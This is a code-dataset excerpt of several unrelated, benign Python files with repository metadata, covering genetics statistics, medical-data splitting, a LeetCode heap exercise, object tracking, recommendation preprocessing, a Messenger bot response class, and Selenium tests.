num, den = allel.stats.hudson_fst(ac_g1, ac_g2)
fst = num/den
for p,v in zip(genoparser.position, fst):
if not (0.0 <= v <= 1.0):
v = 0
FST.append( (v,p) )
FST.sort( reverse=True )
cumulative_fst = 0.0
for (v, p) in FST:
if v < args.minfst:
break
if cumulative_fst > args.cumfst:
break
selected_positions.append( (p, v) )
cumulative_fst += v
c += 1
for (p, v) in selected_positions:
cout('%s\t%s\t%s\t%5.4f' % (p[0], p[1], p[4], v))
| 2,257 | 0 | 69 |
8c203230e3e1b5e416eb97d5dc3c5303073b202d | 3,636 | py | Python | src/preprocess/vipcup_data_split.py | cmlab-mira/MedicalPro | 3918c95197fd24406ce2117cc7ff9ce21bb8c620 | [
"MIT"
] | 6 | 2020-02-01T07:19:32.000Z | 2021-05-10T13:55:49.000Z | src/preprocess/vipcup_data_split.py | cmlab-mira/MedicalPro | 3918c95197fd24406ce2117cc7ff9ce21bb8c620 | [
"MIT"
] | 1 | 2020-06-21T08:33:35.000Z | 2020-06-21T08:33:35.000Z | src/preprocess/vipcup_data_split.py | cmlab-mira/MedicalPro | 3918c95197fd24406ce2117cc7ff9ce21bb8c620 | [
"MIT"
] | 1 | 2020-11-11T06:24:12.000Z | 2020-11-11T06:24:12.000Z | import argparse
import csv
import logging
import random
import numpy as np
import nibabel as nib
from pathlib import Path
if __name__ == "__main__":
logging.basicConfig(format='%(asctime)s | %(name)-4s | %(levelname)-4s | %(message)s',
level=logging.INFO, datefmt='%Y-%m-%d %H:%M:%S')
args = _parse_args()
main(args)
| 42.776471 | 121 | 0.657866 | import argparse
import csv
import logging
import random
import numpy as np
import nibabel as nib
from pathlib import Path
def main(args):
# Randomly split the data into k folds.
patient_dirs = sorted(dir_ for dir_ in (args.resampled_data_dir / 'training').iterdir() if dir_.is_dir())
# Testing fold, which is the official validation fold
test_size = args.test_size
test_folds = patient_dirs[:test_size]
folds = patient_dirs[test_size:]
np.random.seed(0)
output_dir = args.output_dir
if not output_dir.is_dir():
output_dir.mkdir(parents=True)
# Calculate the total tumor size of each patient
patient_info = {}
for dir_ in folds:
patient_id = dir_.name
label_path = dir_ / f'{patient_id}_label.nii.gz'
metadata = nib.load(label_path)
pixel_size = np.prod(metadata.header['pixdim'][1:4])
label = metadata.get_fdata()
tumor_size = np.sum(label[label > 0]) * pixel_size
patient_info[patient_id] = tumor_size
# Randomly shuffle the splited patient group
sorted_patient_list = sorted(patient_info.keys(), key=patient_info.__getitem__)
sorted_patient_list = sorted_patient_list[:-(len(sorted_patient_list) % args.k)]
splited_patient_list = np.array(sorted_patient_list).reshape(-1, args.k)
np.take(splited_patient_list, np.random.permutation(splited_patient_list.shape[1]), axis=1, out=splited_patient_list)
for i in range(args.k):
valid_patient_list = splited_patient_list[:, i].reshape(-1)
valid_folds = [args.resampled_data_dir / 'training' / pid for pid in valid_patient_list]
train_folds = tuple(set(folds) - (set(test_folds) | set(valid_folds)))
csv_path = output_dir / f'{i}.csv'
logging.info(f'Write the data split file to "{csv_path.resolve()}".')
with open(csv_path, 'w', newline='') as f:
writer = csv.writer(f)
writer.writerow(['path', 'type'])
for path in sorted(train_folds):
writer.writerow([path.resolve(), 'train'])
for path in sorted(valid_folds):
writer.writerow([path.resolve(), 'valid'])
for path in sorted(test_folds):
writer.writerow([path.resolve(), 'test'])
# Write testing data split file.
patient_dirs = sorted(dir_ for dir_ in (args.data_dir / 'testing').iterdir() if dir_.is_dir())
csv_path = output_dir / 'testing.csv'
logging.info(f'Write the data split file to "{csv_path.resolve()}".')
with open(csv_path, 'w', newline='') as f:
writer = csv.writer(f)
writer.writerow(['path', 'type'])
for path in patient_dirs:
writer.writerow([path, 'test'])
def _parse_args():
parser = argparse.ArgumentParser(description="The LiTS data split script.")
parser.add_argument('data_dir', type=Path, help='The directory of the data.')
parser.add_argument('resampled_data_dir', type=Path, help='The directory of the resampled data.')
parser.add_argument('output_dir', type=Path, help='The output directory of the data split files.')
parser.add_argument('--k', type=int, choices=[3, 5], default=3,
help='The number of folds for cross-validation.')
parser.add_argument('--test_size', type=int, default=35, help='The number of testing data.')
args = parser.parse_args()
return args
if __name__ == "__main__":
logging.basicConfig(format='%(asctime)s | %(name)-4s | %(levelname)-4s | %(message)s',
level=logging.INFO, datefmt='%Y-%m-%d %H:%M:%S')
args = _parse_args()
main(args)
| 3,233 | 0 | 46 |
85c4bda8994ba1d1ab30006d431cffaa6357194c | 5,887 | py | Python | exercises/super_ugly_number.py | David-Jianguang-Ran/LeetCodePracticeHelper | e76a25704eb41980b8d949ee1046a35a6a6ef0f6 | [
"MIT"
] | null | null | null | exercises/super_ugly_number.py | David-Jianguang-Ran/LeetCodePracticeHelper | e76a25704eb41980b8d949ee1046a35a6a6ef0f6 | [
"MIT"
] | null | null | null | exercises/super_ugly_number.py | David-Jianguang-Ran/LeetCodePracticeHelper | e76a25704eb41980b8d949ee1046a35a6a6ef0f6 | [
"MIT"
] | null | null | null | from base import LeetCodeProblem
class Problem(LeetCodeProblem):
# for behaviours other than exact match between solution output and expected output
# see # Testers in README.md
"""
https://leetcode.com/problems/super-ugly-number/
# first attempt:
## invariant
since all prime factor of SUNum are in primes,
it means SUNums can be obtained by multiplying primes
## approach:
generate SUNum by multiplying members of primes and push onto a max heap
when max heap reaches n size, get max
"""
# instanciate your Problem class and run
prob = Problem()
prob.run()
| 36.79375 | 147 | 0.515543 | from base import LeetCodeProblem
class Problem(LeetCodeProblem):
# for behaviours other than exact match between solution output and expected output
# see # Testers in README.md
"""
https://leetcode.com/problems/super-ugly-number/
# first attempt:
## invariant
since all prime factor of SUNum are in primes,
it means SUNums can be obtained by multiplying primes
## approach:
generate SUNum by multiplying members of primes and push onto a max heap
when max heap reaches n size, get max
"""
def get_tests(self):
# return test cases here
return (
# each test case has the following structure
# ( parameter , expected output ),
# # OR # #
# ( (param1, param2), expected output ),
((12, [2, 7, 13, 19]), 32),
((80, [2,3,7,11,19,31,37,41,43,47]), 189),
((3, [2]), 4),
((10, [2,5,7,11,13,17,23,29,43,53]), 14),
((35, [2,5,7,11,13,23,29,31,53,67,71,73,79,89,97,107,113,127,131,137]), 67),
((80, [2,5,11,17,41,47,53,59,61,67,73,79,89,97,103,107,109,113,127,137]), 274),
((850, [7,13,29,31,37,41,43,53,59,61,71,73,79,83,89,101,107,109,127,131,137,149,151,157,173,227,229,233,239,257]), 48581),
# ((100000, [7,19,29,37,41,47,53,59,61,79,83,89,101,103,109,127,131,137,139,157,167,179,181,199,211,229,233,239,241,251]), 1092889481),
)
def solution(self, n, primes):
# have fun ~ ^_^
class SuperUglyLineUp:
"""This is a max heap filled with unique values only"""
def __init__(self):
self.__array = [1]
@property
def count(self):
return len(self.__array)
@property
def max(self):
return self.__array[0]
@property
def second_max(self):
return max(self.__array[1:3])
def push(self, value: int):
self.__array.append(value)
self._max_heapify(self.count - 1)
def pop(self):
# swap root with a leaf and return leaf
found_max = self.max
self.__array[0] = self.__array[-1]
self.__array.pop()
self._max_heapify(0, down_heap=True)
return found_max
def pop_push(self, value: int):
# pop max first, then push onto the first position, restore heap
self.__array[0] = value
self._max_heapify(0, down_heap=True)
def _max_heapify(self,__index,down_heap=False):
parent = self.__array[__index]
left_i = __index * 2 + 1
left_child = self.__array[left_i] if left_i < self.count else None
right_child = self.__array[left_i + 1] if left_i + 1 < self.count else None
swap_index = None
if (left_child is not None and parent < left_child) or (right_child is not None and parent < right_child):
# heap property violated
# swap parent with biggest child
# the switch below is so long and repetitive
# TODO : find better way to resolve swap
if left_child is None:
swap_index = left_i + 1
swap_value = right_child
elif right_child is None:
swap_index = left_i
swap_value = left_child
# both children present, swap biggest
elif left_child > right_child:
swap_index = left_i
swap_value = left_child
else:
swap_index = left_i + 1
swap_value = right_child
# do the swap
self.__array[swap_index] = parent
self.__array[__index] = swap_value
if down_heap and swap_index:
self._max_heapify(swap_index, down_heap=True)
elif not down_heap and __index != 0:
self._max_heapify((__index - 1) // 2)
def make_ugly_nums(__prev, __clip=0):
"""
returns all possible product between __prev and primes
TODO : needs a new way of generating ugly numbers
"""
output = set()
__min = None
for __i, __each in enumerate(__prev):
if __clip != 0:
to_multiply = primes[:-__clip]
else:
to_multiply = primes
for each_prime in to_multiply:
num = __each * each_prime
if __min is None or __min > num:
__min = num
output.add(num)
return output, __min
# first we make our queue
queue = SuperUglyLineUp()
to_append = primes
smallest = 0
max_clip = len(primes) // 4 * 3
clip = 0
break_next = False
while True:
# push known ugly nums to queue
for each_ugly_num in to_append:
if queue.count > n:
queue.pop_push(each_ugly_num)
else:
queue.push(each_ugly_num)
if smallest * primes[0] > queue.second_max and queue.count > n:
break
# stop recording ugly numbers when no new smaller number is generated
to_append, smallest = make_ugly_nums(to_append, min(max_clip, clip))
clip += len(primes) // 4
# return second max
return queue.second_max
# instanciate your Problem class and run
prob = Problem()
prob.run()
| 5,221 | 0 | 53 |
7ea446547a306d0562fe342d35ffc735e55db031 | 873 | py | Python | python/graphscope/nx/tests/algorithms/forward/operators/test_all.py | LI-Mingyu/GraphScope-MY | 942060983d3f7f8d3a3377467386e27aba285b33 | [
"Apache-2.0"
] | 1,521 | 2020-10-28T03:20:24.000Z | 2022-03-31T12:42:51.000Z | python/graphscope/nx/tests/algorithms/forward/operators/test_all.py | LI-Mingyu/GraphScope-MY | 942060983d3f7f8d3a3377467386e27aba285b33 | [
"Apache-2.0"
] | 850 | 2020-12-15T03:17:32.000Z | 2022-03-31T11:40:13.000Z | python/graphscope/nx/tests/algorithms/forward/operators/test_all.py | LI-Mingyu/GraphScope-MY | 942060983d3f7f8d3a3377467386e27aba285b33 | [
"Apache-2.0"
] | 180 | 2020-11-10T03:43:21.000Z | 2022-03-28T11:13:31.000Z | import networkx.algorithms.operators.tests.test_all
import pytest
from graphscope.nx.utils.compat import import_as_graphscope_nx
import_as_graphscope_nx(networkx.algorithms.operators.tests.test_all,
decorators=pytest.mark.usefixtures("graphscope_session"))
@pytest.mark.skip(reason="not support multigraph")
@pytest.mark.skip(reason="not support multigraph")
@pytest.mark.skip(reason="not support multigraph")
@pytest.mark.skip(reason="not support multigraph")
@pytest.mark.skip(reason="not support multigraph")
@pytest.mark.skip(reason="not support multigraph")
| 22.973684 | 81 | 0.776632 | import networkx.algorithms.operators.tests.test_all
import pytest
from graphscope.nx.utils.compat import import_as_graphscope_nx
import_as_graphscope_nx(networkx.algorithms.operators.tests.test_all,
decorators=pytest.mark.usefixtures("graphscope_session"))
@pytest.mark.skip(reason="not support multigraph")
def test_intersection_all_multigraph_attributes():
pass
@pytest.mark.skip(reason="not support multigraph")
def test_union_all_multigraph():
pass
@pytest.mark.skip(reason="not support multigraph")
def test_mixed_type_union():
pass
@pytest.mark.skip(reason="not support multigraph")
def test_mixed_type_disjoint_union():
pass
@pytest.mark.skip(reason="not support multigraph")
def test_mixed_type_intersection():
pass
@pytest.mark.skip(reason="not support multigraph")
def test_mixed_type_compose():
pass
| 140 | 0 | 132 |
a1ab316782f87a08c7277aac1d21ca2fcbd66929 | 3,226 | py | Python | analytics/ot-iou/iou_tracker.py | QuPengfei/Smart-City-Sample | d0813666467e030fc8a6bcbffd098273912118f8 | [
"BSD-3-Clause"
] | 126 | 2019-07-15T14:44:54.000Z | 2022-03-22T11:03:50.000Z | analytics/ot-iou/iou_tracker.py | QuPengfei/Smart-City-Sample | d0813666467e030fc8a6bcbffd098273912118f8 | [
"BSD-3-Clause"
] | 97 | 2019-07-16T18:28:29.000Z | 2022-03-16T07:27:57.000Z | analytics/ot-iou/iou_tracker.py | QuPengfei/Smart-City-Sample | d0813666467e030fc8a6bcbffd098273912118f8 | [
"BSD-3-Clause"
] | 74 | 2019-07-15T14:45:02.000Z | 2022-03-23T12:10:03.000Z |
import os
| 44.805556 | 169 | 0.583385 |
import os
class IOUTracker(object):
def __init__(self,sigma_l=0,sigma_h=0.5,sigma_iou=0.5,t_min=2):
super(IOUTracker, self).__init__()
self.tracks_active = []
self.tracks_finished = []
self.track_id=0
self.sigma_l=sigma_l
self.sigma_h=sigma_h
self.sigma_iou=sigma_iou
self.t_min=t_min
def iou(self, bbox1, bbox2):
bbox1 = [float(x) for x in bbox1]
bbox2 = [float(x) for x in bbox2]
(x0_1, y0_1, x1_1, y1_1) = bbox1
(x0_2, y0_2, x1_2, y1_2) = bbox2
# get the overlap rectangle
overlap_x0 = max(x0_1, x0_2)
overlap_y0 = max(y0_1, y0_2)
overlap_x1 = min(x1_1, x1_2)
overlap_y1 = min(y1_1, y1_2)
# check if there is an overlap
if overlap_x1 - overlap_x0 <= 0 or overlap_y1 - overlap_y0 <= 0:
return 0
# if yes, calculate the ratio of the overlap to each ROI size and the unified size
size_1 = (x1_1 - x0_1) * (y1_1 - y0_1)
size_2 = (x1_2 - x0_2) * (y1_2 - y0_2)
size_intersection = (overlap_x1 - overlap_x0) * (overlap_y1 - overlap_y0)
size_union = size_1 + size_2 - size_intersection
return size_intersection / size_union
def track(self, detections, debug=False):
dets = [det for det in detections if det['confidence'] >= self.sigma_l]
updated_tracks = []
new_tracks = []
for track in self.tracks_active:
if len(dets) > 0:
# get det with highest iou
best_match = max(dets, key=lambda x: self.iou(track['bboxes'][-1], x['bbox']))
if self.iou(track['bboxes'][-1], best_match['bbox']) >= self.sigma_iou:
track['bboxes'].append(best_match['bbox'])
track['max_confidence'] = max(track['max_confidence'], best_match['confidence'])
track['object_type']=best_match['object_type']
track['idx']=best_match['idx']
updated_tracks.append(track)
if debug: print("keep track: ", track, flush=True)
# remove from best matching detection from detections
del dets[dets.index(best_match)]
# if track was not updated
if len(updated_tracks) == 0 or track is not updated_tracks[-1]:
# finish track when the conditions are met
if track['max_confidence'] >= self.sigma_h and len(track['bboxes']) >= self.t_min:
self.tracks_finished.append(track)
# create new tracks
for det in dets:
new_tracks = [{'track_id': self.track_id,'bboxes': [det['bbox']], 'max_confidence': det['confidence'], 'object_type': det['object_type'], "idx": det["idx"]}]
self.track_id=self.track_id+1
if debug: print("add track: ", new_tracks, flush=True)
self.tracks_active = updated_tracks + new_tracks
# finish all remaining active tracks
self.tracks_finished += [track for track in self.tracks_active
if track['max_confidence'] >= self.sigma_h and len(track['bboxes']) >= self.t_min]
return self.tracks_active
| 3,108 | 4 | 103 |
a218acf09f6d2a9040b321e06c6de2132b281baa | 2,260 | py | Python | src/preprocess.py | Smashh712/chainRec | 128a0b4e9c1728930aaab55f364d681410483fbe | [
"Apache-2.0"
] | 50 | 2018-09-22T12:09:30.000Z | 2021-05-15T13:14:44.000Z | src/preprocess.py | AkkyPali/chainRec | 23badc2a1bb735f6f0a366dcb2c0735f5961b7d6 | [
"Apache-2.0"
] | 3 | 2018-11-23T09:10:02.000Z | 2019-07-31T07:08:22.000Z | src/preprocess.py | AkkyPali/chainRec | 23badc2a1bb735f6f0a366dcb2c0735f5961b7d6 | [
"Apache-2.0"
] | 18 | 2018-09-28T04:09:02.000Z | 2021-10-04T18:16:54.000Z | import numpy as np
import pandas as pd
import gzip
import sys
from collections import Counter
import os
DATA_DIR = "../data/"
if not os.path.exists(DATA_DIR):
os.makedirs(DATA_DIR)
| 35.873016 | 130 | 0.516814 | import numpy as np
import pandas as pd
import gzip
import sys
from collections import Counter
import os
DATA_DIR = "../data/"
if not os.path.exists(DATA_DIR):
os.makedirs(DATA_DIR)
def process_yoochoose():
print("loading yoochoose data ... ")
sys.stdout.flush()
data_buy = pd.read_csv(DATA_DIR+"yoochoose-buys.dat", header=None)
data_buy.columns = ['session_id', 'ts', 'item_id', 'category', 'Qty']
data = dict([(k, dict(zip(v.values, np.ones(len(v)).astype(int)))) for (k, v) in data_buy.groupby(['session_id'])['item_id']])
with open(DATA_DIR+"yoochoose-clicks.dat") as fin:
for l in fin:
sid, _, iid, _ = l.strip().split(",")
sid = int(sid)
iid = int(iid)
if sid in data:
dout = data[sid]
if iid not in dout:
dout[iid] = 0
data[sid] = dout
item_count = np.array(list(Counter([i for u in data for i in data[u]]).items()))
user_map = {}
item_set = set(list(item_count[item_count[:,1].astype(float)>=5,0]))
item_map = {}
print("preprocessing and dumping data ... ")
sys.stdout.flush()
with gzip.open(DATA_DIR+"yoochoose.user_item_map.gz", "w") as fdata:
for uid_str in data:
d0 = data[uid_str]
d = {}
for di in d0:
if di in item_set:
iid = len(item_map)
if di in item_map:
iid = item_map[di]
else:
item_map[di] = iid
d[iid] = d0[di]
if len(d)>0:
dout = {}
uid = len(user_map)
if uid_str in user_map:
uid = user_map[uid_str]
else:
user_map[uid_str] = uid
dout['user_id'] = uid
dout['items'] = d
fdata.write((str(dout)+"\n").encode("utf-8"))
np.savetxt(DATA_DIR+"yoochoose_user_names.csv", np.array(list(user_map.items())), fmt="%s", delimiter=",")
np.savetxt(DATA_DIR+"yoochoose_item_names.csv", np.array(list(item_map.items())), fmt="%s", delimiter=",")
print("done!")
sys.stdout.flush() | 2,042 | 0 | 27 |
b48167b67139ec28d4ec463e0cfd1adfa33938a1 | 1,307 | py | Python | multyqubit.py | kaitodeesu/project2021 | 1b6a850f7c7aaced7173e424c0eca21e8349f071 | [
"MIT"
] | null | null | null | multyqubit.py | kaitodeesu/project2021 | 1b6a850f7c7aaced7173e424c0eca21e8349f071 | [
"MIT"
] | null | null | null | multyqubit.py | kaitodeesu/project2021 | 1b6a850f7c7aaced7173e424c0eca21e8349f071 | [
"MIT"
] | null | null | null | #!/usr/bin/env python
# coding: utf-8
# In[17]:
import numpy as np
from numpy import linalg as LA
dimension=2 #次元を指定する
v=randomnumber(dimension)
e=np.zeros((dimension,dimension),dtype='float64')#エルミット演算子を生成する単位ベクトル
u=getu(dimension)
print(u)
for c in range(0,dimension):
e[c]=u[c]/LA.norm(u[c],2)#·ord=2
print(e)
# In[18]:
#psi=np.random.random((dimension))
#psi=e[0]
psi=np.array([e[0]])
print(psi)
print(LA.norm(psi,2)) #ノルム確認
# In[19]:
np.dot(np.dot(psi,e),psi.T)
# In[27]:
f=0
for a in range(0,10000):
u=getu(dimension)
for c in range(0,dimension):
e[c]=u[c]/LA.norm(u[c],2)#·ord=2
psi=psi=np.array([e[0]])
d=np.dot(np.dot(psi,e),psi.T)
if(d>=0):
f=f+1
print(f)
# # 多量子ビット系
# In[28]:
for a in range(0,2):
# In[ ]:
| 13.904255 | 69 | 0.589135 | #!/usr/bin/env python
# coding: utf-8
# In[17]:
import numpy as np
from numpy import linalg as LA
dimension=2 #次元を指定する
def randomnumber(dimension): #ランダムな行列の生成
return np.random.random((dimension,dimension))
def gram(a,b): #規格化
return ((np.dot(a,b)/np.dot(a,a))*a)
def hermatite(a): #複素共役
return np.conjugate(a.T)
v=randomnumber(dimension)
e=np.zeros((dimension,dimension),dtype='float64')#エルミット演算子を生成する単位ベクトル
def getu(dimension):
u=np.zeros((dimension,dimension),dtype='float64')#規格化するためのベクトル
u[0]=v[0]
x=0
sum=np.array([0,0],dtype='float64')
for a in range(1,dimension):
for b in range(0,a):
sum+=gram(u[b],v[a])
u[a]=v[a]-sum
return u
u=getu(dimension)
print(u)
for c in range(0,dimension):
e[c]=u[c]/LA.norm(u[c],2)#·ord=2
print(e)
# In[18]:
#psi=np.random.random((dimension))
#psi=e[0]
psi=np.array([e[0]])
print(psi)
print(LA.norm(psi,2)) #ノルム確認
# In[19]:
np.dot(np.dot(psi,e),psi.T)
# In[27]:
f=0
for a in range(0,10000):
u=getu(dimension)
for c in range(0,dimension):
e[c]=u[c]/LA.norm(u[c],2)#·ord=2
psi=psi=np.array([e[0]])
d=np.dot(np.dot(psi,e),psi.T)
if(d>=0):
f=f+1
print(f)
# # 多量子ビット系
# In[28]:
for a in range(0,2):
# In[ ]:
| 458 | 0 | 92 |
4eba4d82b6df63e6d64913d575575baca285af09 | 865 | py | Python | datautil.py | zadiran/DataworksOnline | be8e9c207dd6cbe84e4c8afdf956e9360f905320 | [
"MIT"
] | null | null | null | datautil.py | zadiran/DataworksOnline | be8e9c207dd6cbe84e4c8afdf956e9360f905320 | [
"MIT"
] | null | null | null | datautil.py | zadiran/DataworksOnline | be8e9c207dd6cbe84e4c8afdf956e9360f905320 | [
"MIT"
] | null | null | null | import json
import io
| 22.179487 | 73 | 0.647399 | import json
import io
def read_file(filename):
with open(filename) as file:
lines = [line.strip() for line in file]
return lines
def get_columns(lines, delimiter):
return lines[0].split(delimiter)
def get_data(lines, delimiter):
data = []
iterator = iter(lines)
next(iterator) # skip first line with header
for line in iterator:
data.append(line.split(delimiter))
return data
def read_bytes(byte_arr):
convert = lambda a : a.decode('utf-8')
lines = list( map(convert, io.BytesIO(byte_arr).read().splitlines()))
return lines
def get_parsed_file(byte_arr, delimiter):
data = read_bytes(byte_arr)
result = {
'columns': get_columns(data, delimiter),
'data': get_data(data, delimiter),
}
result['data_json'] = json.dumps(result['data'])
return result
| 727 | 0 | 115 |
1259747036f2db45257e6dc9bb60b6e03de0137a | 4,759 | py | Python | messenger/utils/response/response.py | functioncall/rescue-habit | 98c9d3f2feff0ed100523f9822865a139f6f7648 | [
"MIT"
] | null | null | null | messenger/utils/response/response.py | functioncall/rescue-habit | 98c9d3f2feff0ed100523f9822865a139f6f7648 | [
"MIT"
] | null | null | null | messenger/utils/response/response.py | functioncall/rescue-habit | 98c9d3f2feff0ed100523f9822865a139f6f7648 | [
"MIT"
] | null | null | null | import json
import os
import random
import requests
from django_project import settings
from django.http import HttpResponse, JsonResponse
from messenger.utils.response.ResponseTypes.QuickReplyResponse import QuickReplyResponse
from messenger.utils.response.ResponseTypes.TextResponse import TextResponse
from django.conf import settings
def value_validator(variables, values):
"""
1. Checks if "values" is of type <dict>
2. Checks if all variables are present in the values <dict>
:param variables: <list>
:param values: <dict>
:raise: InvalidTemplateValues, IncompleteTemplateValues
:return None
"""
return None
# if type(values) is not dict:
# raise InvalidTemplateValues(values)
# elif set(variables) != set(dict.keys(values)):
# raise IncompleteTemplateValues([v for v in variables if v not in values])
class Response(object):
"""
Response class for chat data and text templating.
"""
def __init__(self, data, page_access_token=None):
"""
:param data: message data
"""
self.params = {"access_token": page_access_token}
self.headers = {"Content-Type": "application/json"}
self.data = {"recipient": {"id": None}, "message": {}}
self.text = TextResponse(data["text"]) \
if "text" in data else None
self.quick_replies = QuickReplyResponse(data["quick_replies"]) \
if "quick_replies" in data else None
self.attachments = data.get("attachments", {})
def add_recipient_id(self, recipient_id):
"""
Adds the chat receivers id to instance
:param recipient_id: facebook_id of a chat participant
"""
self.data["recipient"]["id"] = recipient_id
def send_to(self, recipient_id, page_access_token, node_name):
"""
Orders messages before sending
:param recipient_id: facebook_id of a chat participant
"""
self.params = {"access_token": page_access_token}
self.add_recipient_id(recipient_id)
r = None
if self.quick_replies and self.text: # If quick_replies and text
r = self.send(self.data["message"], ["quick_replies", "text"], recipient_id) # are both present send both
elif self.text:
# send text if quick_replies
r = self.send(self.data["message"], ["text"], recipient_id) # are not present
if self.attachments: # Send attachments alone
r = self.send(self.data["message"], ["attachment"], recipient_id)
# always, in compatible with
# text and quick_replies
self.data['intent'] = node_name
return JsonResponse(self.data)
def extract_message(self, text_response_data=None, quick_reply_response_data=None, attachment_response_data=None):
"""
Evaluate template strings in text/quick_replies/attachments and convert them to a value.
:param text_response_data:
:param quick_reply_response_data:
:param attachment_response_data:
:rtype: Response
"""
if self.text:
self.data["message"]["text"] = self.text.eval(text_response_data)
if self.quick_replies:
self.data["message"]["quick_replies"] = self.quick_replies.eval(quick_reply_response_data)
if self.attachments:
if attachment_response_data:
stringified_attachments = json.dumps(self.attachments)
for item in attachment_response_data:
stringified_attachments = stringified_attachments.replace('{}', str(item), 1)
self.attachments = json.loads(stringified_attachments)
print('*' * 100)
self.data["message"]["attachment"] = self.attachments
return self
def send(self, message, types, recipient_id):
"""
HTTP Request to facebook endpoint to send messages
:param message:
:param types:
:param recipient_id:
:return:
"""
data = {
"recipient": {
"id": recipient_id
},
"message": {
type: message[type] for type in types
}
}
if self.params.get('access_token'):
# r = requests.post(
# "https://graph.facebook.com/v4.0/me/messages",
# params=self.params,
# headers=self.headers,
# data=json.dumps(data)
# )
# print(r.text)
return JsonResponse(data, status=200)
else:
return JsonResponse({}, status=200)
| 34.737226 | 120 | 0.602858 | import json
import os
import random
import requests
from django_project import settings
from django.http import HttpResponse, JsonResponse
from messenger.utils.response.ResponseTypes.QuickReplyResponse import QuickReplyResponse
from messenger.utils.response.ResponseTypes.TextResponse import TextResponse
from django.conf import settings
def value_validator(variables, values):
"""
1. Checks if "values" is of type <dict>
2. Checks if all variables are present in the values <dict>
:param variables: <list>
:param values: <dict>
:raise: InvalidTemplateValues, IncompleteTemplateValues
:return None
"""
return None
# if type(values) is not dict:
# raise InvalidTemplateValues(values)
# elif set(variables) != set(dict.keys(values)):
# raise IncompleteTemplateValues([v for v in variables if v not in values])
class Response(object):
"""
Response class for chat data and text templating.
"""
def __init__(self, data, page_access_token=None):
"""
:param data: message data
"""
self.params = {"access_token": page_access_token}
self.headers = {"Content-Type": "application/json"}
self.data = {"recipient": {"id": None}, "message": {}}
self.text = TextResponse(data["text"]) \
if "text" in data else None
self.quick_replies = QuickReplyResponse(data["quick_replies"]) \
if "quick_replies" in data else None
self.attachments = data.get("attachments", {})
def add_recipient_id(self, recipient_id):
"""
Adds the chat receivers id to instance
:param recipient_id: facebook_id of a chat participant
"""
self.data["recipient"]["id"] = recipient_id
def send_to(self, recipient_id, page_access_token, node_name):
"""
Orders messages before sending
:param recipient_id: facebook_id of a chat participant
"""
self.params = {"access_token": page_access_token}
self.add_recipient_id(recipient_id)
r = None
if self.quick_replies and self.text: # If quick_replies and text
r = self.send(self.data["message"], ["quick_replies", "text"], recipient_id) # are both present send both
elif self.text:
# send text if quick_replies
r = self.send(self.data["message"], ["text"], recipient_id) # are not present
if self.attachments: # Send attachments alone
r = self.send(self.data["message"], ["attachment"], recipient_id)
# always, in compatible with
# text and quick_replies
self.data['intent'] = node_name
return JsonResponse(self.data)
def extract_message(self, text_response_data=None, quick_reply_response_data=None, attachment_response_data=None):
"""
Evaluate template strings in text/quick_replies/attachments and convert them to a value.
:param text_response_data:
:param quick_reply_response_data:
:param attachment_response_data:
:rtype: Response
"""
if self.text:
self.data["message"]["text"] = self.text.eval(text_response_data)
if self.quick_replies:
self.data["message"]["quick_replies"] = self.quick_replies.eval(quick_reply_response_data)
if self.attachments:
if attachment_response_data:
stringified_attachments = json.dumps(self.attachments)
for item in attachment_response_data:
stringified_attachments = stringified_attachments.replace('{}', str(item), 1)
self.attachments = json.loads(stringified_attachments)
print('*' * 100)
self.data["message"]["attachment"] = self.attachments
return self
def send(self, message, types, recipient_id):
"""
HTTP Request to facebook endpoint to send messages
:param message:
:param types:
:param recipient_id:
:return:
"""
data = {
"recipient": {
"id": recipient_id
},
"message": {
type: message[type] for type in types
}
}
if self.params.get('access_token'):
# r = requests.post(
# "https://graph.facebook.com/v4.0/me/messages",
# params=self.params,
# headers=self.headers,
# data=json.dumps(data)
# )
# print(r.text)
return JsonResponse(data, status=200)
else:
return JsonResponse({}, status=200)
| 0 | 0 | 0 |
2802007a914ccea0529db32e456238e601b7bb66 | 4,238 | py | Python | tests/test_web_ui.py | underground-lab/zelezobeton | 5afd96c3123b3d8accca107c6e60a3f6fdecdf27 | [
"MIT"
] | 2 | 2022-01-10T11:46:46.000Z | 2022-01-11T08:32:54.000Z | tests/test_web_ui.py | underground-lab/zelezobeton | 5afd96c3123b3d8accca107c6e60a3f6fdecdf27 | [
"MIT"
] | 1 | 2022-01-13T09:16:25.000Z | 2022-01-14T08:39:12.000Z | tests/test_web_ui.py | underground-lab/zelezobeton | 5afd96c3123b3d8accca107c6e60a3f6fdecdf27 | [
"MIT"
] | null | null | null | # coding: utf-8
import os
from urllib.request import urlopen
import pytest
from selenium.webdriver import Firefox, ActionChains
from selenium.webdriver.common.by import By
from selenium.webdriver.firefox.options import Options
from selenium.webdriver.support.expected_conditions import staleness_of
from selenium.webdriver.support.wait import WebDriverWait
URL = 'http://localhost:8000/'
HEADLESS = not os.getenv('NO_HEADLESS')
try:
with urlopen(URL):
SERVER_RUNNING = True
except OSError:
SERVER_RUNNING = False
@pytest.fixture
@pytest.mark.skipif(not SERVER_RUNNING, reason='requires local server running')
| 37.175439 | 85 | 0.717084 | # coding: utf-8
import os
from urllib.request import urlopen
import pytest
from selenium.webdriver import Firefox, ActionChains
from selenium.webdriver.common.by import By
from selenium.webdriver.firefox.options import Options
from selenium.webdriver.support.expected_conditions import staleness_of
from selenium.webdriver.support.wait import WebDriverWait
URL = 'http://localhost:8000/'
HEADLESS = not os.getenv('NO_HEADLESS')
try:
with urlopen(URL):
SERVER_RUNNING = True
except OSError:
SERVER_RUNNING = False
@pytest.fixture
def driver():
options = Options()
options.headless = HEADLESS
firefox_driver = Firefox(options=options)
firefox_driver.implicitly_wait(5)
firefox_driver.get(URL)
yield firefox_driver
# teardown
firefox_driver.quit()
@pytest.mark.skipif(not SERVER_RUNNING, reason='requires local server running')
def test_web_ui(driver):
def perform_and_wait(action, obj):
dropdown = driver.find_element(By.ID, f'{action}_dropdown')
button = driver.find_element(By.ID, f'{action}_{obj}_button')
condition = staleness_of(driver.find_element(By.ID, 'room_description'))
actions = ActionChains(driver).move_to_element(dropdown).click(button)
wait = WebDriverWait(driver, 5)
actions.perform()
wait.until(condition)
# start a new game
driver.find_element(By.ID, 'new_game').click()
assert 'Chodba' in driver.find_element(By.ID, 'room_description').text
assert driver.find_element(By.ID, 'open_dropdown')
assert 'dveře' in driver.find_element(By.ID, 'in_room').text
assert 'minci' in driver.find_element(By.ID, 'in_inventory').text
perform_and_wait('go', 'north')
assert 'Kancelář' in driver.find_element(By.ID, 'room_description').text
assert 'plechovku' in driver.find_element(By.ID, 'in_room').text
assert driver.find_element(By.ID, 'open_dropdown')
perform_and_wait('open', 'plechovka')
